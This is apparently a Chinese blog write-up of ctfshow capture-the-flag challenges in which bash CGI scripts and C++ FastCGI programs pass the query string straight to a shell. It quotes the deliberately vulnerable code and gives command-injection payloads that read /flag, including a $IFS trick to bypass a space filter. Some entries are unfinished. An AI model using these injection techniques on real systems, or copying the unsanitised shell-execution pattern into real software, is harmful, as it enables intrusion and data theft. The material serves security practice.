ctfshow web入门嵌入式 bash cpp pwn

baozongwi

已于 2024-05-24 12:11:37 修改

阅读量445

点赞数 6

文章标签：前端 bash android web安全

于 2024-05-23 13:26:37 首次发布

本文链接：https://blog.csdn.net/2301_81040377/article/details/139144485

版权

kali转bash shell方法
方便我们本地

bash脚本教程
下面这个代码是bash脚本

#!/bin/bash
  OIFS="$IFS"
  IFS=","       //表示逗号为字段分隔符
  set $QUERY_STRING     //将参数传入数组
  Args=($QUERY_STRING)
  IFS="$OIFS"    //恢复原始IFS值
  if [ "${Args[2]}"ctf = "admin"ctf ]; then
          echo "`${Args[0]}$IFS${Args[1]}`"
  fi  //结束if语句
exit 0

我们靠传入的角标为0 1 的值构造命令

?ls,/,admin
?cat,/flag,admin

web462

#!/bin/bash
 OIFS="$IFS"
  IFS=","
  set $QUERY_STRING
  Args=($QUERY_STRING)
  IFS="$OIFS"
  if [ "${Args[0]}"ctf = "ping"ctf ]; then
          addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"
          addr="ping -c 1 "$addr
          $addr
  fi

这个是思路看不懂代码先欠着
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"这句怎么看都晕，打通以后来改文章
?ping,

web463

#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>


/* just get lastest info */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
	FILE * fp;
	char * p = NULL;
	int res = -1;
	if (cmd == NULL || pRetMsg == NULL || msg_len < 0)
	{
		printf("Param Error!\n");
		return -1;
	}
	if ((fp = popen(cmd, "r") ) == NULL)   //执行命令并且创造一个管道将放回结果放入管道里面
	{
		printf("Popen Error!\n");
		return -2;
	}
	else
	{
		memset(pRetMsg, 0, msg_len);
		//get lastest result
		while(fgets(pRetMsg, msg_len, fp) != NULL)
		{
			printf("Msg:%s",pRetMsg); //print all info
		}

		if ( (res = pclose(fp)) == -1)   //输出管道
		{
			printf("close popenerror!\n");
			return -3;
		}
		pRetMsg[strlen(pRetMsg)-1] = '\0';
		return 0;
	}
}

int main(void)
{
    int count = 0;
    char *cmd = "";
    char a8Result[128] = {0};
    int ret = 0;
    while (FCGI_Accept() >= 0)
        printf("Content-type: text/html\r\n"
        "\r\n"
        "<title>CTFshow</title>"
        "<h1>where is flag?</h1>"
        );
        cmd=getenv("QUERY_STRING");
	ret  = _System(cmd, a8Result, sizeof(a8Result));
        printf("ret = %d \nresult = %s\nlength = %d \n", ret, a8Result, strlen(a8Result));
    return 0;
}

试探性的上了一个ls，回显了，然后过滤了空格，尝试了一下$IFS可以绕过

?cat$IFS/f*
?cat${IFS}/f*

web464

#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>


/* just get lastest info */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
	FILE * fp;
	char * p = NULL;
	int res = -1;
	if (cmd == NULL || pRetMsg == NULL || msg_len < 0)
	{
		printf("Param Error!\n");
		return -1;
	}
	if ((fp = popen(cmd, "r") ) == NULL)
	{
		printf("Popen Error!\n");
		return -2;
	}
	else
	{
		memset(pRetMsg, 0, msg_len);
		//get lastest result
		while(fgets(pRetMsg, msg_len, fp) != NULL)
		{
			printf("Msg:%s",pRetMsg); //print all info
		}

		if ( (res = pclose(fp)) == -1)
		{
			printf("close popenerror!\n");
			return -3;
		}
		pRetMsg[strlen(pRetMsg)-1] = '\0';
		return 0;
	}
}

int main(void)
{
    int count = 0;
    char *cmd = "";
    char a8Result[128] = {0};
    int ret = 0;
    while (FCGI_Accept() >= 0)
        printf("Content-type: text/html\r\n"
        "\r\n"
        "<title>CTFshow</title>"
        "<h1>where is flag?</h1>"
        );
        cmd=getenv("QUERY_STRING");
	ret  = _System(cmd, a8Result, sizeof(a8Result));
    return 0;
}